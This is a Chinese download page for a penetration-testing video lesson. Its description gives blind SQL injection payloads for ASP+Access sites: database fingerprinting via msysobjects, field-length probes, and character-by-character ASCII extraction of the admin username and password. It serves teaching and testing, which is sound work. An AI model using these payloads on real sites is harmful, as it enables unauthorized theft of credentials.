您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第三课:asp+access数据库利用acsii码逐个字节猜解
实战渗透测试第三课:asp+access数据库利用acsii码逐个字节猜解
软件大小:65.3 MB
更新时间:2016-10-31 02:11
授权方式:共享版
人气访问:214次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第三课:asp+access数据库利用acsii码逐个字节猜解介绍

讲师:巅峰邪恶

动画名称:渗透测试第三课  asp+access数据库利用acsii码逐个字节猜解


测试环境:Win7 系统


and exists(select * from sysobjects)  判断数据库   如果返回正常则为mssql数据


and exists(select * from msysobjects)  返回正常为access数据库


判断字段长度


and(select top 1 len(字段) from 表名)>0


username 字段的长度是5个


password 字段的长度是16个


admin


判断字断assic码


and (select top 1 asc(mid(字段,1,1)) from 表名)>数值

and (select top 1 asc(mid(字段,2,1)) from 表名)>数值


a从97开始


A从65开始


a b c d

username字段第一位是97

username字段第二位是100

实战渗透测试第三课:asp+access数据库利用acsii码逐个字节猜解下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号